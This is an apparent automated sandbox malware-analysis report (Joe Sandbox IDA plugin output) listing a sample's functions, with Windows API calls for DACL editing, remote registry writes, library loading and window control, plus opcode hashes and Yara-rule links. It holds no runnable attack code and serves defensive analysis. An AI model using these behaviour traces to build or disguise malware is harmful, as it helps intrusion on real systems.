                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00F6178C
                                                                                                                                                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00F617C6
                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F617E2
                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00F617F9
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F61801
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00F61808
                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F61829
                                                                                                                                                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00F61830
                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F6185F
                                                                                                                                                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F61881
                                                                                                                                                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F61893
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F618BA
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F618C1
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F618CA
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F618D1
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F618DA
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F618E1
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00F618ED
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F618F4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61ADF: GetProcessHeap.KERNEL32(00000008,00F614FD,?,00000000,?,00F614FD,?), ref: 00F61AED
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F614FD,?), ref: 00F61AF4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F614FD,?), ref: 00F61B03
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e055cda8eab798522e2099066c86b96a5b9dd1c1c49387c4ab5b8709c8b7bb5f
                                                                                                                                                                                                                                                                                        • Instruction ID: 317d1eb4eb651e693f907ab4f7d8105275e8c66b3b3613eea78b2cd99f7bac6c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e055cda8eab798522e2099066c86b96a5b9dd1c1c49387c4ab5b8709c8b7bb5f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44714AB2D00209AFDF10DFA5DC45FAEBBB8BF44350F284226F915A71A1D7359A05EB60
                                                                                                                                                                                                                                                                                        Function 00F8CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8CF1D
                                                                                                                                                                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F9DCD0,00000000,?,00000000,?,?), ref: 00F8CFA4
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00F8D004
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8D054
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8D0CF
                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00F8D112
                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00F8D221
                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00F8D2AD
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F8D2E1
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F8D2EE
                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00F8D3C0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                        • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                                        • Opcode ID: 7b84f76fb0ebbe71272c5bad86ea63ffc4ace2bfa0b0e26d4c55f15edbddd4ee
                                                                                                                                                                                                                                                                                        • Instruction ID: eef04bbca032e16fd2aa6d3da845dcf846c00d7717ae124fa5e1ec7a61716020
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b84f76fb0ebbe71272c5bad86ea63ffc4ace2bfa0b0e26d4c55f15edbddd4ee
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC127A356046019FD714EF14C881F6AB7E5EF88724F04885DF88A9B3A2CB35ED02EB91
                                                                                                                                                                                                                                                                                        Function 00F913BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00F91462
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F9149D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F914F0
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F91526
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F915A2
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F9161D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F1FD52: _wcslen.LIBCMT ref: 00F1FD5D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F63535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F63547
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                                        • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                                        • Opcode ID: a0456e248e5bae1645c18c896daddb7dd7ac31e863e2ab621c3201dd020c7c2f
                                                                                                                                                                                                                                                                                        • Instruction ID: bac9bc03c8e85e7457a1c3eabdeb32a5ba210440cb1a9f1c871fe1f60ad5b02f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0456e248e5bae1645c18c896daddb7dd7ac31e863e2ab621c3201dd020c7c2f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DE1D232A04302CFDB10DF24C95096AB7E2FF94354B55496CF8969B3A2CB34ED46EB81
                                                                                                                                                                                                                                                                                        Function 00F8D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                        • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                        • Opcode ID: c78795e6f6c694b1d496d80472270cc60189caf85423f9743be3c2f8a1659b56
                                                                                                                                                                                                                                                                                        • Instruction ID: 296105f4b9775b6908b88d759da569d07f2a9bca5a5e2b5629dc918f14586919
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c78795e6f6c694b1d496d80472270cc60189caf85423f9743be3c2f8a1659b56
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8471F632A0012A8BCB10FE7CCE51AFB33A1AF60774B250129F8569B2D5FA35DD45B790
                                                                                                                                                                                                                                                                                        Function 00F98D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F98DB5
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F98DC9
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F98DEC
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F98E0F
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F98E4D
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F96691), ref: 00F98EA9
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F98EE2
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F98F25
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F98F5C
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F98F68
                                                                                                                                                                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F98F78
                                                                                                                                                                                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,00F96691), ref: 00F98F87
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F98FA4
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F98FB0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                        • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                        • Opcode ID: d10ff380afa7dbfc77a68daeac7438c70673a5cb0197f17c4de05833de10dcc4
                                                                                                                                                                                                                                                                                        • Instruction ID: d709f2df76945a59c4bee55deba33df233c6f7b55d9ecff3dd0de2566cc6a8f7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d10ff380afa7dbfc77a68daeac7438c70673a5cb0197f17c4de05833de10dcc4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A61E071A00219BAFF14DFA4DC41BBE77A8AF09BA4F104106F915D60D1DBB4A941EBA0
                                                                                                                                                                                                                                                                                        Function 00F748BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00F7493D
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F74948
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F7499F
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F749DD
                                                                                                                                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?), ref: 00F74A1B
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F74A63
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F74A9E
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F74ACC
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                        • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                        • Opcode ID: 3775abf9545ee0a96f2bcb90368f4d1e6d6ce048843a2beb1e2bc9b1d73d4a5e
                                                                                                                                                                                                                                                                                        • Instruction ID: ed194d3850e49010d75a3d02d494c090582a8f2c34897ea099eda55f09dbc67a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3775abf9545ee0a96f2bcb90368f4d1e6d6ce048843a2beb1e2bc9b1d73d4a5e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD71D5729043029FC310EF24CC4196BB7E4EF94768F50892EF89597291EB35ED45EB92
                                                                                                                                                                                                                                                                                        Function 00F66382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 00F66395
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F663A7
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00F663BE
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00F663D3
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00F663D9
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00F663E9
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00F663EF
                                                                                                                                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F66410
                                                                                                                                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F6642A
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F66433
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6649A
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00F664D6
                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00F664DC
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00F664E3
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00F6653A
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00F66547
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00F6656C
                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F66596
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d083583081599040ac524d4641d74f0b93589a6fc0f61ea1fb2c6f2c0804aee8
                                                                                                                                                                                                                                                                                        • Instruction ID: 1b7505605fff7e359a1d797bc3a841c7a80baa5b59e0c45049245f373259659e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d083583081599040ac524d4641d74f0b93589a6fc0f61ea1fb2c6f2c0804aee8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F716F31900609AFDB20DFA8CE85B6EBBF5FF48714F100519E586E26A0DB75ED44EB50
                                                                                                                                                                                                                                                                                        Function 00F8086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00F80884
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00F8088F
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00F8089A
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00F808A5
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00F808B0
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00F808BB
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00F808C6
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00F808D1
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00F808DC
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00F808E7
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00F808F2
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00F808FD
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00F80908
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00F80913
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00F8091E
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00F80929
                                                                                                                                                                                                                                                                                        • GetCursorInfo.USER32(?), ref: 00F80939
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F8097B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 088f6a666c75ff040a176cdb1869a0710351a65be673b56da1180d99de063300
                                                                                                                                                                                                                                                                                        • Instruction ID: 00d8d72fb91b8acb6b17280bcbfb3cd290ee35d4130a571b018492e06158cef4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 088f6a666c75ff040a176cdb1869a0710351a65be673b56da1180d99de063300
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D14154B0D083196ADB509FBA8C8985EBFE8FF04764B50452AE11CE7291DA789801DF91
                                                                                                                                                                                                                                                                                        Function 00F20436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00F20436
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00FD170C,00000FA0,302581DA,?,?,?,?,00F42733,000000FF), ref: 00F2048C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00F42733,000000FF), ref: 00F20497
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00F42733,000000FF), ref: 00F204A8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F204BE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F204CC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F204DA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F20505
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F20510
